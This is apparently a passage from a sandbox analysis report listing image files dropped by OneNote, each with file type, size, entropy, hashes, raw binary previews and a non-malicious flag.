                                                                                                        Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2232
                                                                                                        Entropy (8bit):7.837610270261933
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                        MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                        SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                        SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                        SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 88 x 574, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):19920
                                                                                                        Entropy (8bit):7.987696084459766
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:DRSgtAxJx7bzvAsVSqQElOT4uHmpmvNYT9aPU+QtsC2LgfIqJZnbeyRB:DsgaN7bzvAsVdK4uGQFUZ6bU/p3
                                                                                                        MD5:1BDAD9B3B6DE549162F9567697389E1C
                                                                                                        SHA1:5D9C09159F07A3A9BDCC6C4B9BD9CB72D0184E6F
                                                                                                        SHA-256:0908A4CFA23F93011176D47F45843E9CA2973030421996E8E27484781F54B0EC
                                                                                                        SHA-512:475040779AC247BB5C3E11862FB55FBDDFA12D759EE86A33E11BC1F3B656D6CD0F9B25146C0113E43E1D8001D8867D3BC3BF7E6FE21F3A0016CB1F8B70B7A15A
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...X...>......y=h....PLTE..................................t........iw..............................................._n|...Tds...ky......................................................p~.....................................................dr.................v.............................................n{.......ap}..........x.....z...................u......................|..Vfu............r.....w........................................~...................Zjx...................................Yiw............w..|....................Xgv{.....y...........................jx..............\lz.........}..z.....t..[ky........u..y.....gu................................{..........}.....u....................~...........y....r.....bKGD....H....cmPPJCmp0712....H.s...JfIDATx^...\.W./.}....Sy...(..4....D.-.....H...% .$"D.Qr.......`..;...6...N......s...^...L.....Y{.GQU`..~...j....{...-Ax.K..&.....F..I\i..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 39 x 579, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):515
                                                                                                        Entropy (8bit):6.740133870626016
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:6v/7su2/c30mqkg9VgFHe7Ll8UmJX/N+1Zmkk8f3lbtI4:4mc38gFHe18lkk8f3lbth
                                                                                                        MD5:E96BE30D892A5412CF262FEE652921CA
                                                                                                        SHA1:8190A0BFE21D04BC6F3A406E91B87CA69C03A2DE
                                                                                                        SHA-256:0E31DA4DFCFF4A36C64C1CE940362D2309769F36369E4C43C317D5F2FA15658E
                                                                                                        SHA-512:D647F51ABBD013226A6ADD0D551D058C633F867F9AF5A9E099B85D6E291D220F7B85958B07381CD4C7C4F72356DBAFE2A86932AE398E28C56CDDF0744E92EE24
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...'...C........b...`PLTE..................................................................................................bKGD....H....cmPPJCmp0712....H.s....9IDATx^..I..@.C..<..?mo.#C((.J}...~..B...b.I.i.\<.e.....(p.I.EO...q.x.......dRz....K..b0.:.<c.o..0.x\:...F....I&..ap....."P@....DO...q)p*..@Y.CL2)=......1.........4....._.G..^`..lDO...q...X....SL..z....K..#.L#..I6..ap.Ls.,....7&..ap.p..lI...,GO...q.....k.n1..4......3=.f.x.$..4.....o....x.$+..0.x\.,&6...............IEND.B`.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16003
                                                                                                        Entropy (8bit):7.959532793770661
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                        MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                        SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                        SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                        SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):40884
                                                                                                        Entropy (8bit):7.545929039957292
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
                                                                                                        MD5:7379775A1E2AB7FAB95CFFCE01AE05F3
                                                                                                        SHA1:3D3DDFD8AC7E07203561BAE423D66F0806833AB3
                                                                                                        SHA-256:9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
                                                                                                        SHA-512:4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8184
                                                                                                        Entropy (8bit):7.807848176906598
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                        MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                        SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                        SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                        SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):39010
                                                                                                        Entropy (8bit):7.362726513389497
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
                                                                                                        MD5:9700DE02720CDB5A45EDE51F1A4647EC
                                                                                                        SHA1:CF72A73E1181719B1CC45C2FE0A6B619081E115E
                                                                                                        SHA-256:7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
                                                                                                        SHA-512:5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......|]v....D..9.k.w.|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):12824
                                                                                                        Entropy (8bit):7.974776104184905
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                        MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                        SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                        SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                        SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):59707
                                                                                                        Entropy (8bit):7.858445368171059
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:k76rvGc8WKC2/UX1uEgVRY/jvv9CblyL/T:k77Z5C2/Ow1e9CblCT
                                                                                                        MD5:47ADB0DF6FDA756920225A099B722322
                                                                                                        SHA1:851946B8C2BD0BB351BAEECA9E5BB6648A87D7CA
                                                                                                        SHA-256:EC8CD7250F3D82E900E99114869777EE859EC73EFFABED108815F65742078C3A
                                                                                                        SHA-512:85A9920E1CE4A2FCCEBAFA425C925DF33580FA3C3C00178F058539B2FBC0163866DB8A41B320E2EF2CD217F00FFA06A1A831C728D3F9F910C9EAC58B5DA76E2D
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..A..Qaq"....2........B#..R.b3$..8xrC4&'W.%e.(.c.d.5E6Ff..h..SsTt..u...Gg..H.....................!.1..AQ.aq.".......2..st.BR..56.r#3.b.S.4c%...$d.CT............?....3.7...G:../P....z..K.:6..w......6....... .z7...~.....{gdF60...9....{...'[N....m.........z...g{.......7...4..1..=.z...._..p...m..Icd.~.v..9.P..0Z(.<j.......R6zm.....v.z...>x..)=g........zo{..w..f..y.t.....%.D..#.}.I.>).H.QM..cLD..x.../.^y.{.............y.=^.......I.T.......U..0_?...u..og..3.ky..K....6w...Dc......~........ik.z....N...en......_.....x....._u...4.{..P...>.....}.......>.R.....m.....[mt.....}.........|.....m......~....B.F.]C.36..q....yg...{]...+.DZv.9<.o..;..N.n&im.,....w.3...V.s...Y..e#$.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1570
                                                                                                        Entropy (8bit):7.780157858994452
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                        MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                        SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                        SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                        SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16003
                                                                                                        Entropy (8bit):7.959532793770661
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                        MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                        SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                        SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                        SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):68633
                                                                                                        Entropy (8bit):7.709776384921022
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
                                                                                                        MD5:41241EE59AB7BC9EB34784E3BCE31CB4
                                                                                                        SHA1:98680761A51E9199CF3C89F68B5309FBEC7EE3CB
                                                                                                        SHA-256:035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
                                                                                                        SHA-512:3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):53259
                                                                                                        Entropy (8bit):7.651662052139301
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
                                                                                                        MD5:2EE369ABB7936F8C28FF0ABDD224EA05
                                                                                                        SHA1:FE9D304A7B49E31EAE439369ABC548E265149636
                                                                                                        SHA-256:FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
                                                                                                        SHA-512:5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}.*.a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{|>..MN=:....Q[..H....a........|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u...*.p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14553
                                                                                                        Entropy (8bit):7.951135681293377
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                        MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                        SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                        SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                        SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 30 x 700, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1547
                                                                                                        Entropy (8bit):6.4194805172468286
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:dZeDNYbS+238CTUFPA6SXG5qSacX9q73eXu0vC3dU+OB2gbwHRuZ:dykp9FzBBacXQ3uNC3n7xuZ
                                                                                                        MD5:0BA36A74DFBF411FAB348404CCEC3348
                                                                                                        SHA1:4C619790E517416E178161028987DF1CD3B871CC
                                                                                                        SHA-256:2E7AAF26BEC32148B96442E8FFF1BD2CEF2D72630969F23B9A2ABEDB6CFEC93B
